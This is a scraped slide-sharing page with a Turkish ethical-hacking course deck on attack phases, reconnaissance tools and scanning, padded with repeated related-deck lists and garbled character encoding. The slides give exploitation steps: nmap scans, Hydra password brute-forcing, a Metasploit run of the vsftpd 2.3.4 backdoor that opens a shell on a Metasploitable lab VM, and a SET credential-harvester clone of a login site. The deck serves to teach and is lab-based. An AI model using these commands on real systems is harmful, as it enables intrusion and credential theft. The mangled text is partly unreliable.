G端venlik Sistemlerini Atlatma  ve Al脹nacak DerslerG端venlik Sistemlerini Atlatma  ve Al脹nacak Dersler
G端venlik Sistemlerini Atlatma ve Al脹nacak Dersler
BGA Cyber Security
Yaz脹l脹m G端venlii Temelleri
Yaz脹l脹m G端venlii TemelleriYaz脹l脹m G端venlii Temelleri
Yaz脹l脹m G端venlii Temelleri
BGA Cyber Security
LINUX, WINDOWS VE A S聴STEMLER聴 SIZMA TESTLER聴
LINUX, WINDOWS VE A S聴STEMLER聴 SIZMA TESTLER聴 LINUX, WINDOWS VE A S聴STEMLER聴 SIZMA TESTLER聴
LINUX, WINDOWS VE A S聴STEMLER聴 SIZMA TESTLER聴
BGA Cyber Security
Web Uygulama G端ven(siz)lii
Web Uygulama G端ven(siz)liiWeb Uygulama G端ven(siz)lii
Web Uygulama G端ven(siz)lii
BGA Cyber Security
Zararl脹 Yaz脹l脹m Analizi Eitimi Lab Kitab脹
Zararl脹 Yaz脹l脹m Analizi Eitimi Lab Kitab脹Zararl脹 Yaz脹l脹m Analizi Eitimi Lab Kitab脹
Zararl脹 Yaz脹l脹m Analizi Eitimi Lab Kitab脹
BGA Cyber Security
Uygulamali Sizma Testi (Pentest) Egitimi Sunumu - 1
Uygulamali Sizma Testi (Pentest) Egitimi Sunumu - 1Uygulamali Sizma Testi (Pentest) Egitimi Sunumu - 1
Uygulamali Sizma Testi (Pentest) Egitimi Sunumu - 1
BTRisk Bilgi G端venlii ve BT Y旦netiim Hizmetleri
Siber Sald脹r脹lar i巽in Erken Uyar脹 Sistemi
Siber Sald脹r脹lar i巽in Erken Uyar脹 SistemiSiber Sald脹r脹lar i巽in Erken Uyar脹 Sistemi
Siber Sald脹r脹lar i巽in Erken Uyar脹 Sistemi
BGA Cyber Security
Web Uygulama G端venlii 101
Web Uygulama G端venlii 101Web Uygulama G端venlii 101
Web Uygulama G端venlii 101
Mehmet Ince
Uygulamali Sizma Testi (Pentest) Egitimi Sunumu - 3
Uygulamali Sizma Testi (Pentest) Egitimi Sunumu - 3Uygulamali Sizma Testi (Pentest) Egitimi Sunumu - 3
Uygulamali Sizma Testi (Pentest) Egitimi Sunumu - 3
BTRisk Bilgi G端venlii ve BT Y旦netiim Hizmetleri
Beyaz apkal脹 Hacker CEH Eitimi - B旦l端m 13, 14, 15
Beyaz apkal脹 Hacker CEH Eitimi - B旦l端m 13, 14, 15Beyaz apkal脹 Hacker CEH Eitimi - B旦l端m 13, 14, 15
Beyaz apkal脹 Hacker CEH Eitimi - B旦l端m 13, 14, 15
BGA Cyber Security
BTRisk - Siber Olay Tespit ve Mudahale Egitimi
BTRisk - Siber Olay Tespit ve Mudahale EgitimiBTRisk - Siber Olay Tespit ve Mudahale Egitimi
BTRisk - Siber Olay Tespit ve Mudahale Egitimi
BTRisk Bilgi G端venlii ve BT Y旦netiim Hizmetleri
Metasploit Framework Eitimi
Metasploit Framework EitimiMetasploit Framework Eitimi
Metasploit Framework Eitimi
BGA Cyber Security
Beyaz apkal脹 Hacker CEH Eitimi - B旦l端m 10, 11, 12
Beyaz apkal脹 Hacker CEH Eitimi - B旦l端m 10, 11, 12Beyaz apkal脹 Hacker CEH Eitimi - B旦l端m 10, 11, 12
Beyaz apkal脹 Hacker CEH Eitimi - B旦l端m 10, 11, 12
BGA Cyber Security
Snort IPS(Intrusion Prevention System) Eitimi
Snort IPS(Intrusion Prevention System) EitimiSnort IPS(Intrusion Prevention System) Eitimi
Snort IPS(Intrusion Prevention System) Eitimi
BGA Cyber Security
Siber G端venlik ve Etik Hacking Sunu - 9
Siber G端venlik ve Etik Hacking Sunu - 9Siber G端venlik ve Etik Hacking Sunu - 9
Siber G端venlik ve Etik Hacking Sunu - 9
Murat KARA
Siber G端venlik ve Etik Hacking Sunu - 4
Siber G端venlik ve Etik Hacking Sunu - 4Siber G端venlik ve Etik Hacking Sunu - 4
Siber G端venlik ve Etik Hacking Sunu - 4
Murat KARA
Siber G端venlik ve Etik Hacking Sunu - 13
Siber G端venlik ve Etik Hacking Sunu - 13Siber G端venlik ve Etik Hacking Sunu - 13
Siber G端venlik ve Etik Hacking Sunu - 13
Murat KARA
Beyaz apkal脹 Hacker CEH Eitimi - B旦l端m 7, 8, 9
Beyaz apkal脹 Hacker CEH Eitimi - B旦l端m 7, 8, 9Beyaz apkal脹 Hacker CEH Eitimi - B旦l端m 7, 8, 9
Beyaz apkal脹 Hacker CEH Eitimi - B旦l端m 7, 8, 9
BGA Cyber Security
Siber G端venlik ve Etik Hacking Sunu - 11
Siber G端venlik ve Etik Hacking Sunu - 11Siber G端venlik ve Etik Hacking Sunu - 11
Siber G端venlik ve Etik Hacking Sunu - 11
Murat KARA
Nmap101 Eitim Sunumu - Nmap Kullan脹m K脹lavuzu
Nmap101 Eitim Sunumu - Nmap Kullan脹m K脹lavuzuNmap101 Eitim Sunumu - Nmap Kullan脹m K脹lavuzu
Nmap101 Eitim Sunumu - Nmap Kullan脹m K脹lavuzu
Mehmet Caner K旦rolu
G端venlik Sistemlerini Atlatma ve Al脹nacak Dersler
G端venlik Sistemlerini Atlatma  ve Al脹nacak DerslerG端venlik Sistemlerini Atlatma  ve Al脹nacak Dersler
G端venlik Sistemlerini Atlatma ve Al脹nacak Dersler
BGA Cyber Security
Yaz脹l脹m G端venlii Temelleri
Yaz脹l脹m G端venlii TemelleriYaz脹l脹m G端venlii Temelleri
Yaz脹l脹m G端venlii Temelleri
BGA Cyber Security
LINUX, WINDOWS VE A S聴STEMLER聴 SIZMA TESTLER聴
LINUX, WINDOWS VE A S聴STEMLER聴 SIZMA TESTLER聴 LINUX, WINDOWS VE A S聴STEMLER聴 SIZMA TESTLER聴
LINUX, WINDOWS VE A S聴STEMLER聴 SIZMA TESTLER聴
BGA Cyber Security
Web Uygulama G端ven(siz)lii
Web Uygulama G端ven(siz)liiWeb Uygulama G端ven(siz)lii
Web Uygulama G端ven(siz)lii
BGA Cyber Security
Zararl脹 Yaz脹l脹m Analizi Eitimi Lab Kitab脹
Zararl脹 Yaz脹l脹m Analizi Eitimi Lab Kitab脹Zararl脹 Yaz脹l脹m Analizi Eitimi Lab Kitab脹
Zararl脹 Yaz脹l脹m Analizi Eitimi Lab Kitab脹
BGA Cyber Security
Siber Sald脹r脹lar i巽in Erken Uyar脹 Sistemi
Siber Sald脹r脹lar i巽in Erken Uyar脹 SistemiSiber Sald脹r脹lar i巽in Erken Uyar脹 Sistemi
Siber Sald脹r脹lar i巽in Erken Uyar脹 Sistemi
BGA Cyber Security
Web Uygulama G端venlii 101
Web Uygulama G端venlii 101Web Uygulama G端venlii 101
Web Uygulama G端venlii 101
Mehmet Ince
Beyaz apkal脹 Hacker CEH Eitimi - B旦l端m 13, 14, 15
Beyaz apkal脹 Hacker CEH Eitimi - B旦l端m 13, 14, 15Beyaz apkal脹 Hacker CEH Eitimi - B旦l端m 13, 14, 15
Beyaz apkal脹 Hacker CEH Eitimi - B旦l端m 13, 14, 15
BGA Cyber Security
Metasploit Framework Eitimi
Metasploit Framework EitimiMetasploit Framework Eitimi
Metasploit Framework Eitimi
BGA Cyber Security
Beyaz apkal脹 Hacker CEH Eitimi - B旦l端m 10, 11, 12
Beyaz apkal脹 Hacker CEH Eitimi - B旦l端m 10, 11, 12Beyaz apkal脹 Hacker CEH Eitimi - B旦l端m 10, 11, 12
Beyaz apkal脹 Hacker CEH Eitimi - B旦l端m 10, 11, 12
BGA Cyber Security
Snort IPS(Intrusion Prevention System) Eitimi
Snort IPS(Intrusion Prevention System) EitimiSnort IPS(Intrusion Prevention System) Eitimi
Snort IPS(Intrusion Prevention System) Eitimi
BGA Cyber Security

Similar to Siber Guvenlik ve Etik Hhacking -2- (20)

Hacking Uygulamalar脹 ve Ara巽lar脹
Hacking Uygulamalar脹 ve Ara巽lar脹Hacking Uygulamalar脹 ve Ara巽lar脹
Hacking Uygulamalar脹 ve Ara巽lar脹
Mustafa
Ozgur Yazilimlar ile Saldiri Yontemleri
Ozgur Yazilimlar ile Saldiri YontemleriOzgur Yazilimlar ile Saldiri Yontemleri
Ozgur Yazilimlar ile Saldiri Yontemleri
Fatih Ozavci
Dogus University-Web Application Security
Dogus University-Web Application SecurityDogus University-Web Application Security
Dogus University-Web Application Security
mtimur
Web Hacking
Web HackingWeb Hacking
Web Hacking
Kale Siber Akademi
Network
NetworkNetwork
Network
Turgay Kaya
W3af ile Web Uygulama G端venlik Testleri II
W3af ile Web Uygulama G端venlik Testleri  IIW3af ile Web Uygulama G端venlik Testleri  II
W3af ile Web Uygulama G端venlik Testleri II
BGA Cyber Security
Siber g端venlik ve SOC
Siber g端venlik ve SOCSiber g端venlik ve SOC
Siber g端venlik ve SOC
Serkan zden
Web uygulama a巽脹kl脹klar脹ndan faydalanarak sistem ele ge巽irme
Web uygulama a巽脹kl脹klar脹ndan faydalanarak sistem ele ge巽irmeWeb uygulama a巽脹kl脹klar脹ndan faydalanarak sistem ele ge巽irme
Web uygulama a巽脹kl脹klar脹ndan faydalanarak sistem ele ge巽irme
BTRisk Bilgi G端venlii ve BT Y旦netiim Hizmetleri
Bilgi G端venlii ve A G端venlii //F脹rat niversitesi Siber G端venlik Konferans脹
Bilgi G端venlii ve A G端venlii //F脹rat niversitesi Siber G端venlik Konferans脹Bilgi G端venlii ve A G端venlii //F脹rat niversitesi Siber G端venlik Konferans脹
Bilgi G端venlii ve A G端venlii //F脹rat niversitesi Siber G端venlik Konferans脹
Raif Berkay D聴NEL
Owasp top 10 inceleme
Owasp top 10 incelemeOwasp top 10 inceleme
Owasp top 10 inceleme
Cyber-Warrior.org
Siber G端venlik ve Etik Hacking Sunu - 1
Siber G端venlik ve Etik Hacking Sunu - 1Siber G端venlik ve Etik Hacking Sunu - 1
Siber G端venlik ve Etik Hacking Sunu - 1
Murat KARA
Uygulamali Sizma Testi (Pentest) Egitimi Sunumu - 2
Uygulamali Sizma Testi (Pentest) Egitimi Sunumu - 2Uygulamali Sizma Testi (Pentest) Egitimi Sunumu - 2
Uygulamali Sizma Testi (Pentest) Egitimi Sunumu - 2
BTRisk Bilgi G端venlii ve BT Y旦netiim Hizmetleri
Log y旦netimi ve 5651
Log y旦netimi ve 5651Log y旦netimi ve 5651
Log y旦netimi ve 5651
Osman do?n
Siber_Guvenlik_ve_Etik_Hacking-2023-BB.pdf
Siber_Guvenlik_ve_Etik_Hacking-2023-BB.pdfSiber_Guvenlik_ve_Etik_Hacking-2023-BB.pdf
Siber_Guvenlik_ve_Etik_Hacking-2023-BB.pdf
Murat KARA
Siber_Guvenlik_ve_Etik_Hacking-2023-Z.pdf
Siber_Guvenlik_ve_Etik_Hacking-2023-Z.pdfSiber_Guvenlik_ve_Etik_Hacking-2023-Z.pdf
Siber_Guvenlik_ve_Etik_Hacking-2023-Z.pdf
Murat KARA
Bilge adam beikta ube ethical hacking ve s脹zma y旦ntemleri etkinlii
Bilge adam beikta ube ethical hacking ve s脹zma y旦ntemleri etkinliiBilge adam beikta ube ethical hacking ve s脹zma y旦ntemleri etkinlii
Bilge adam beikta ube ethical hacking ve s脹zma y旦ntemleri etkinlii
EPICROUTERS
2010 Kocaeli Linux G端nleri - Linux G端venlik Uygulamalar脹Linux
2010 Kocaeli Linux G端nleri - Linux G端venlik Uygulamalar脹Linux 2010 Kocaeli Linux G端nleri - Linux G端venlik Uygulamalar脹Linux
2010 Kocaeli Linux G端nleri - Linux G端venlik Uygulamalar脹Linux
Burak Ouz
Web Guvenligi Konferansi - Web Hacking Yontemleri
Web Guvenligi Konferansi - Web Hacking YontemleriWeb Guvenligi Konferansi - Web Hacking Yontemleri
Web Guvenligi Konferansi - Web Hacking Yontemleri
EPICROUTERS
Rusya kaynakl脹 siber sald脹r脹lar
Rusya kaynakl脹 siber sald脹r脹larRusya kaynakl脹 siber sald脹r脹lar
Rusya kaynakl脹 siber sald脹r脹lar
Alper Baaran
Hacking Uygulamalar脹 ve Ara巽lar脹
Hacking Uygulamalar脹 ve Ara巽lar脹Hacking Uygulamalar脹 ve Ara巽lar脹
Hacking Uygulamalar脹 ve Ara巽lar脹
Mustafa
Ozgur Yazilimlar ile Saldiri Yontemleri
Ozgur Yazilimlar ile Saldiri YontemleriOzgur Yazilimlar ile Saldiri Yontemleri
Ozgur Yazilimlar ile Saldiri Yontemleri
Fatih Ozavci
Dogus University-Web Application Security
Dogus University-Web Application SecurityDogus University-Web Application Security
Dogus University-Web Application Security
mtimur
W3af ile Web Uygulama G端venlik Testleri II
W3af ile Web Uygulama G端venlik Testleri  IIW3af ile Web Uygulama G端venlik Testleri  II
W3af ile Web Uygulama G端venlik Testleri II
BGA Cyber Security
Siber g端venlik ve SOC
Siber g端venlik ve SOCSiber g端venlik ve SOC
Siber g端venlik ve SOC
Serkan zden
Bilgi G端venlii ve A G端venlii //F脹rat niversitesi Siber G端venlik Konferans脹
Bilgi G端venlii ve A G端venlii //F脹rat niversitesi Siber G端venlik Konferans脹Bilgi G端venlii ve A G端venlii //F脹rat niversitesi Siber G端venlik Konferans脹
Bilgi G端venlii ve A G端venlii //F脹rat niversitesi Siber G端venlik Konferans脹
Raif Berkay D聴NEL
Siber G端venlik ve Etik Hacking Sunu - 1
Siber G端venlik ve Etik Hacking Sunu - 1Siber G端venlik ve Etik Hacking Sunu - 1
Siber G端venlik ve Etik Hacking Sunu - 1
Murat KARA
Log y旦netimi ve 5651
Log y旦netimi ve 5651Log y旦netimi ve 5651
Log y旦netimi ve 5651
Osman do?n
Siber_Guvenlik_ve_Etik_Hacking-2023-BB.pdf
Siber_Guvenlik_ve_Etik_Hacking-2023-BB.pdfSiber_Guvenlik_ve_Etik_Hacking-2023-BB.pdf
Siber_Guvenlik_ve_Etik_Hacking-2023-BB.pdf
Murat KARA
Siber_Guvenlik_ve_Etik_Hacking-2023-Z.pdf
Siber_Guvenlik_ve_Etik_Hacking-2023-Z.pdfSiber_Guvenlik_ve_Etik_Hacking-2023-Z.pdf
Siber_Guvenlik_ve_Etik_Hacking-2023-Z.pdf
Murat KARA
Bilge adam beikta ube ethical hacking ve s脹zma y旦ntemleri etkinlii
Bilge adam beikta ube ethical hacking ve s脹zma y旦ntemleri etkinliiBilge adam beikta ube ethical hacking ve s脹zma y旦ntemleri etkinlii
Bilge adam beikta ube ethical hacking ve s脹zma y旦ntemleri etkinlii
EPICROUTERS
2010 Kocaeli Linux G端nleri - Linux G端venlik Uygulamalar脹Linux
2010 Kocaeli Linux G端nleri - Linux G端venlik Uygulamalar脹Linux 2010 Kocaeli Linux G端nleri - Linux G端venlik Uygulamalar脹Linux
2010 Kocaeli Linux G端nleri - Linux G端venlik Uygulamalar脹Linux
Burak Ouz
Web Guvenligi Konferansi - Web Hacking Yontemleri
Web Guvenligi Konferansi - Web Hacking YontemleriWeb Guvenligi Konferansi - Web Hacking Yontemleri
Web Guvenligi Konferansi - Web Hacking Yontemleri
EPICROUTERS
Rusya kaynakl脹 siber sald脹r脹lar
Rusya kaynakl脹 siber sald脹r脹larRusya kaynakl脹 siber sald脹r脹lar
Rusya kaynakl脹 siber sald脹r脹lar
Alper Baaran

More from Murat KARA (16)

Siber G端venlik Fark脹ndal脹k Eitimi - Liseler 聴巽in
Siber G端venlik Fark脹ndal脹k Eitimi - Liseler 聴巽inSiber G端venlik Fark脹ndal脹k Eitimi - Liseler 聴巽in
Siber G端venlik Fark脹ndal脹k Eitimi - Liseler 聴巽in
Murat KARA
Python Programlama Diline Giri G端ncelleme 2024
Python Programlama Diline Giri G端ncelleme 2024Python Programlama Diline Giri G端ncelleme 2024
Python Programlama Diline Giri G端ncelleme 2024
Murat KARA
Linux 聴letim Sistemi - G端ncelleme - 2023
Linux 聴letim Sistemi - G端ncelleme - 2023Linux 聴letim Sistemi - G端ncelleme - 2023
Linux 聴letim Sistemi - G端ncelleme - 2023
Murat KARA
INFTEC-2024 Python Programlama Giri Kursu
INFTEC-2024 Python Programlama Giri KursuINFTEC-2024 Python Programlama Giri Kursu
INFTEC-2024 Python Programlama Giri Kursu
Murat KARA
Klavye Kullan脹m脹
Klavye Kullan脹m脹Klavye Kullan脹m脹
Klavye Kullan脹m脹
Murat KARA
Siber G端venlik ve Etik Hacking Sunu - 14
Siber G端venlik ve Etik Hacking Sunu - 14Siber G端venlik ve Etik Hacking Sunu - 14
Siber G端venlik ve Etik Hacking Sunu - 14
Murat KARA
Siber G端venlik ve Etik Hacking Sunu - 2
Siber G端venlik ve Etik Hacking Sunu - 2Siber G端venlik ve Etik Hacking Sunu - 2
Siber G端venlik ve Etik Hacking Sunu - 2
Murat KARA
Web Site Tasar脹m脹 (HTML-Css) Dersi G端ncelleme - 2018
Web Site Tasar脹m脹 (HTML-Css) Dersi G端ncelleme - 2018Web Site Tasar脹m脹 (HTML-Css) Dersi G端ncelleme - 2018
Web Site Tasar脹m脹 (HTML-Css) Dersi G端ncelleme - 2018
Murat KARA
Python Programlama Diline Giri - G端ncelleme 2018
Python Programlama Diline Giri - G端ncelleme 2018Python Programlama Diline Giri - G端ncelleme 2018
Python Programlama Diline Giri - G端ncelleme 2018
Murat KARA
Linux 聴letim Sistemi - G端ncelleme-2018
Linux 聴letim Sistemi - G端ncelleme-2018Linux 聴letim Sistemi - G端ncelleme-2018
Linux 聴letim Sistemi - G端ncelleme-2018
Murat KARA
Google Hakk脹nda Bildiklerimiz-Bilmediklerimiz
Google Hakk脹nda Bildiklerimiz-BilmediklerimizGoogle Hakk脹nda Bildiklerimiz-Bilmediklerimiz
Google Hakk脹nda Bildiklerimiz-Bilmediklerimiz
Murat KARA
Photoshop cs 5
Photoshop cs 5 Photoshop cs 5
Photoshop cs 5
Murat KARA
Bilgisayar Alar脹 (Network Jeopardy) B端y端k Risk -1-
Bilgisayar Alar脹 (Network Jeopardy) B端y端k Risk -1-Bilgisayar Alar脹 (Network Jeopardy) B端y端k Risk -1-
Bilgisayar Alar脹 (Network Jeopardy) B端y端k Risk -1-
Murat KARA
聴letim Sistemleri (Operating Systems)
聴letim Sistemleri (Operating Systems)聴letim Sistemleri (Operating Systems)
聴letim Sistemleri (Operating Systems)
Murat KARA
Kablosuz Alar (Wireless)
Kablosuz Alar (Wireless)Kablosuz Alar (Wireless)
Kablosuz Alar (Wireless)
Murat KARA
Web Site Tasarimi (HTML)
Web Site Tasarimi (HTML)Web Site Tasarimi (HTML)
Web Site Tasarimi (HTML)
Murat KARA
Siber G端venlik Fark脹ndal脹k Eitimi - Liseler 聴巽in
Siber G端venlik Fark脹ndal脹k Eitimi - Liseler 聴巽inSiber G端venlik Fark脹ndal脹k Eitimi - Liseler 聴巽in
Siber G端venlik Fark脹ndal脹k Eitimi - Liseler 聴巽in
Murat KARA
Python Programlama Diline Giri G端ncelleme 2024
Python Programlama Diline Giri G端ncelleme 2024Python Programlama Diline Giri G端ncelleme 2024
Python Programlama Diline Giri G端ncelleme 2024
Murat KARA
Linux 聴letim Sistemi - G端ncelleme - 2023
Linux 聴letim Sistemi - G端ncelleme - 2023Linux 聴letim Sistemi - G端ncelleme - 2023
Linux 聴letim Sistemi - G端ncelleme - 2023
Murat KARA
INFTEC-2024 Python Programlama Giri Kursu
INFTEC-2024 Python Programlama Giri KursuINFTEC-2024 Python Programlama Giri Kursu
INFTEC-2024 Python Programlama Giri Kursu
Murat KARA
Klavye Kullan脹m脹
Klavye Kullan脹m脹Klavye Kullan脹m脹
Klavye Kullan脹m脹
Murat KARA
Siber G端venlik ve Etik Hacking Sunu - 14
Siber G端venlik ve Etik Hacking Sunu - 14Siber G端venlik ve Etik Hacking Sunu - 14
Siber G端venlik ve Etik Hacking Sunu - 14
Murat KARA
Siber G端venlik ve Etik Hacking Sunu - 2
Siber G端venlik ve Etik Hacking Sunu - 2Siber G端venlik ve Etik Hacking Sunu - 2
Siber G端venlik ve Etik Hacking Sunu - 2
Murat KARA
Web Site Tasar脹m脹 (HTML-Css) Dersi G端ncelleme - 2018
Web Site Tasar脹m脹 (HTML-Css) Dersi G端ncelleme - 2018Web Site Tasar脹m脹 (HTML-Css) Dersi G端ncelleme - 2018
Web Site Tasar脹m脹 (HTML-Css) Dersi G端ncelleme - 2018
Murat KARA
Python Programlama Diline Giri - G端ncelleme 2018
Python Programlama Diline Giri - G端ncelleme 2018Python Programlama Diline Giri - G端ncelleme 2018
Python Programlama Diline Giri - G端ncelleme 2018
Murat KARA
Linux 聴letim Sistemi - G端ncelleme-2018
Linux 聴letim Sistemi - G端ncelleme-2018Linux 聴letim Sistemi - G端ncelleme-2018
Linux 聴letim Sistemi - G端ncelleme-2018
Murat KARA
Google Hakk脹nda Bildiklerimiz-Bilmediklerimiz
Google Hakk脹nda Bildiklerimiz-BilmediklerimizGoogle Hakk脹nda Bildiklerimiz-Bilmediklerimiz
Google Hakk脹nda Bildiklerimiz-Bilmediklerimiz
Murat KARA
Photoshop cs 5
Photoshop cs 5 Photoshop cs 5
Photoshop cs 5
Murat KARA
Bilgisayar Alar脹 (Network Jeopardy) B端y端k Risk -1-
Bilgisayar Alar脹 (Network Jeopardy) B端y端k Risk -1-Bilgisayar Alar脹 (Network Jeopardy) B端y端k Risk -1-
Bilgisayar Alar脹 (Network Jeopardy) B端y端k Risk -1-
Murat KARA
聴letim Sistemleri (Operating Systems)
聴letim Sistemleri (Operating Systems)聴letim Sistemleri (Operating Systems)
聴letim Sistemleri (Operating Systems)
Murat KARA
Kablosuz Alar (Wireless)
Kablosuz Alar (Wireless)Kablosuz Alar (Wireless)
Kablosuz Alar (Wireless)
Murat KARA
Web Site Tasarimi (HTML)
Web Site Tasarimi (HTML)Web Site Tasarimi (HTML)
Web Site Tasarimi (HTML)
Murat KARA

Siber Guvenlik ve Etik Hhacking -2-

  • 1. S聴BER SALDIRI YNTEMLER聴, B聴LG聴 TOPLAMA ARALARI 9.Hafta
  • 2. Sald脹r脹 Aamalar脹 Bilgi Toplama(Veri) Haz脹rl脹k(A巽脹kl脹k Tespiti) Sald脹r脹(A巽脹kl脹k S旦m端rme) Eriim Yetki Y端kseltme 聴zleri Silmek
  • 3. Sald脹r脹 MetodolojisiBilgiToplama Aktif Pasif Tarama Zafiyet Dorulama Sisteme S脹zma Yetki Y端kseltme Kendini Gizleme Arka Kap脹 B脹rakma
  • 4. Sald脹r脹 Y旦ntem ve eitleri Sistem tespiti (Fingerprinting) Zafiyetlerin Tespit Edilmesi Sistem ve Uygulamaya Y旦nelik Sald脹r脹lar脹 A G端venliine Y旦nelik Sald脹r脹lar Sosyal M端hendislik Sald脹r脹lar脹
  • 5. Bilgi Toplama Y旦ntemleri Pasif Sistemle dorudan iletiime ge巽meden yap脹lan bilgi toplama ilemleridir. Aktif Sistemle dorudan iletiime ge巽erek yap脹lan bilgi toplama ilemleridir.
  • 6. Pasif Bilgi Toplama Ara巽lar脹 Whois/DNS(whois, Ripe, vb.) Arama motorlar脹 (Google, Bing, vb.) Dnsstuff (dnsstuff.com) Netcraft (netcraft.com) Ariv siteleri (archive.org) IP Location (iplocation.net) Shodan (shodan.io) Bilgi toplama ara巽lar脹
  • 7. Aktif Bilgi Toplama Ara巽lar脹 Ping Nslookup Traceroute dig dnsmap Dmitry Fierce The Harvester Maltego Foca hping Nmap Centralops.net Pentest-tools.com Exploit-db.com (Google Hacking Database) Robtex.com Mxtoolbox.com Dnsstuff.com
  • 8. whois Kali -> Terminal -> #whois cu.edu.tr
  • 19. Ping
  • 20. host
  • 23. dig
  • 30. Foca
  • 31. hping
  • 33. nmap
  • 42. TARAMA, ZAF聴YET TESP聴T聴 VE PAROLA KIRMA 10. Hafta
  • 43. Tarama Nmap Host, versiyon, tcp, ping, protocol, vb.. Hping3 Port, flag(paket), udp, vb.. Zmap Netcat Nbtscan
  • 44. nmap Nmap (Network Mapper) sT (3l端 el s脹k脹ma) sS (Syn taramas脹) sA (Ack firewall varm脹) P 80 (ping olmadan 80.port) sU (Udp portlar) V (versiyonlar) O (iletim sistemi tahmini) nmap -sS -sV --open -n 192.168.1.1
  • 45. Zafiyet Tespiti Network Nessus, OpenVas, INFRA Web Nikto, Acunetix, Burp Suite, Owasp Zap Metasploit Metasploitable 2
  • 46. Parola K脹rma Hydra Medusa Mimikatz Ncrack hydra -L userlist -P passlist 192.168.0.1 protokol
  • 47. Uygulama 1 Metasploitable 2 Nmap vsftpd Metasploit Exploit
  • 48. Metasploitable Sanal makine olarak 巽温鉛脹岳脹姻脹霞看姻顎噛..
  • 50. Metasploitable ifconfig komutu ile IP bilgisini 旦reniyoruz..
  • 51. Eriim Kontrol端 Kali sanal makinam脹zdan Metasploitable2 sanal makinam脹za ping ile eriim salad脹脹m脹z脹 kontrol ediyoruz. (Metasploitable脹n IPsini 旦renmitik)
  • 52. Nmap ile Tarama Nmap arac脹 ile sanal makinam脹z脹n taramas脹n脹 balat脹yoruz. (Tarad脹脹m脹z makine, metasploitable sanal makinesi)
  • 53. Nmap Tarama Sonu巽lar脹 Tarama sonucu zaafiyetler bar脹ndan sistemde a巽脹k olan servisler, portlar脹 ve s端r端m bilgilerine eriiyoruz.
  • 54. Nmap Sonucu Deerlendirme 聴lk s脹rada bulunan ftp servisinin vsftpd s端r端m端ne ilikin bir zafiyet s旦m端rme arac脹 varm脹 kontrol ediyoruz.
  • 56. Metasploit Metasploit i巽erisinde vsftpd ile ilgili arama yap脹yoruz.. search vsftpd Bir adet backdoor buluyoruz.
  • 57. Metasploit Bulduumuz exploiti kullanmaya ve se巽eneklerini g旦rmeye bal脹yoruz. use exploit/unix/ftp/vsftpd_234_backdoor show options
  • 58. Metasploit Ard脹ndan RHOST ile IP tan脹ml脹yoruz, payload se巽eneklerine bak脹yoruz. set RHOST 192.168.72.131 show payloads
  • 59. Metasploit Payload脹 kullanmak i巽in tan脹ml脹yoruz ve se巽eneklerine bak脹yoruz. set payload cmd/unix/interact show payloads
  • 60. Metasploit RPORT ile port tan脹mlamas脹n脹 yap脹yoruz. set RPORT 21
  • 61. Metasploit Tan脹mlad脹脹m脹z bilgiler dorultusunda payload脹n 巽al脹t脹r脹lmas脹 i巽in balat脹yoruz. exploit veya Run
  • 62. Metasploit Exploit 巽al脹t脹 baar脹l脹 bir ekilde payload makinan脹n shell oturumunu a巽t脹.. Art脹k sistemdeyiz
  • 63. Uygulama 2 Metasploitable 2 Nmap ssh hydra
  • 64. Metasploitable Hedef sistem olarak belirlenen sanal makinam脹z脹n IP bilgisini 旦rendikten sonra Nmap taramas脹 ile erimek istediimiz servisleri belirliyoruz. (telnet ve ssh)
  • 65. Hydra ile Parola K脹rma Ata脹 Servislerin kullan脹c脹 ad脹 ve parolas脹n脹 tekil olarak tahmin ile denemek i巽in Hydray脹 kullan脹yoruz. (telnet ve ssh)
  • 66. Hydra Kullan脹c脹 ad脹 ve parola listeleri oluturup onlar脹 Hydra ile deniyoruz.
  • 68. Uygulama 3 Man in the Middle Sosyal m端hendislik
  • 69. Sosyal M端hendislik Site clone y旦ntemi ile kiileri orijinal sitelerin benzer zararl脹 kopyalar脹na ulat脹r脹p kullan脹c脹 ad脹 ve parola bilgilerini alma ama巽l脹 bir sosyal m端hendislik sald脹r脹 旦rnei oluturmak i巽in; Se-Toolkit kullan脹yoruz.
  • 71. Sosyal M端hendislik Sosyal M端hendislik Ata脹n脹 壊艶巽庄霞看姻顎噛..
  • 72. Sosyal M端hendislik Web site ata脹n脹 壊艶巽庄霞看姻顎噛..
  • 73. Sosyal M端hendislik Kimlik Dorulay脹c脹(Credential Harvester) ata脹n脹 壊艶巽庄霞看姻顎噛..
  • 74. Sosyal M端hendislik Site klonlamay脹 壊艶巽庄霞看姻顎噛..
  • 75. Sosyal M端hendislik Klon site i巽in IP adresi belirleyip, Ger巽ek sitenin url bilgisini yaz脹yoruz.(klonu yap脹lacak site)
  • 76. Sosyal M端hendislik Klonumuz haz脹r.. Art脹k taray脹c脹 ile IP adresine gelen kullan脹c脹n脹n bilgilerini alabiliriz..
  • 79. Sosyal M端hendislik Kullan脹c脹 bilgilerini girdiinde ve giri yapt脹脹nda sanki yanl脹 yaz脹lm脹 gibi orijinal siteye g旦nderiyor..
  • 81. Sosyal M端hendislik Kullan脹c脹n脹n girdii bilgiler art脹k elimizde Kullan脹c脹 ad脹 ve parola..
  • 82. WEB GVENL聴聴 SALDIRI VE SAVUNMA YNTEM-ARALARI (TEM聴Z KOD) 11. Hafta
  • 83. Web TCP/IP Http protokol端 Web Server
  • 84. HTTP Metodlar脹 Y旦ntem A巽脹klama GET Sunucudan bir kayna脹 ister HEAD GET gibi kullan脹l脹r ama sadece Header getirir ve i巽erik getirmez POST Sunucuda bulunan verinin i巽eriini deitirmesini ister PUT Sunucuda bir kaynak yaratmas脹n脹 veya baka kaynak ile deitirmesini ister DELETE Sunucuda bulunan bir kayna脹 silmesini ister CONNECT SSL balant脹lar脹n HTTP balant脹lar脹 i巽inden ge巽mesini salar OPTIONS Sunucudan bir kaynakla ilgili ge巽erli y旦ntemleri ister TRACE Sunucunun istek Headerlar脹n脹 geri g旦ndermesini ister
  • 85. HTTP Durum Kodlar脹 1xx: Bilgi mesajlar脹. 2xx: Baar脹l脹 istek yan脹tlar脹. 3xx: 聴stemciyi baka bir kaynaa y旦nlendiren yan脹tlar. 4xx: Bir hata bar脹nd脹ran isteklere kar脹 端retilen yan脹tlar. 5xx: Sunucu taraf脹nda istek kar脹lanmaya 巽al脹脹l脹rken bir hata al脹nd脹脹na ilikin yan脹tlar. 404Page not found
